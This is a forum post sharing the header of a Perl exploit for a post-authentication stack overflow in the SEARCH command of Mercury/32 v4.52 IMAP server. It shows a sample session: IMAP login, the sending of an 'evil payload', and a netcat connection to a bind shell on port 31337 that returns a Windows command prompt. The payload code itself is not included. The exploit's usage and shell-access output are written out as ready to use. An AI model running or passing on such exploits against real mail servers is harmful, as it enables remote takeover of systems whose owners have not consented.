Jump to content
nullbyte

Mercury/32 4.52 Imapd Search Command Post-auth Overflow

Recommended Posts

Posted

# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org

# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit

# Found & Code by void# ph4nt0m.org

#

# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.

# C: pst06 LOGIN void ph4nt0m.org

# S: pst06 OK LOGIN completed.

# C: pst06 SELECT INBOX

# S: * 0 EXISTS

# S: * 0 RECENT

# S: * FLAGS (\Deleted \Draft \Seen \Answered)

# S: * OK [uIDVALIDITY 1190225819] UID Validity

# S: * OK [uIDNEXT 1] Predicted next UID

# S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag

# s

# S: pst06 OK [READ-WRITE] SELECT completed.

# [*] Send Evil Payload ...

# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P

#

# Z:\Exp>nc -vv 127.0.0.1 31337

# DNS fwd/rev mismatch: localhost != GNU

# localhost [127.0.0.1] 31337 (?) open

# Microsoft Windows XP [°? 5.1.2600]

# © °

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...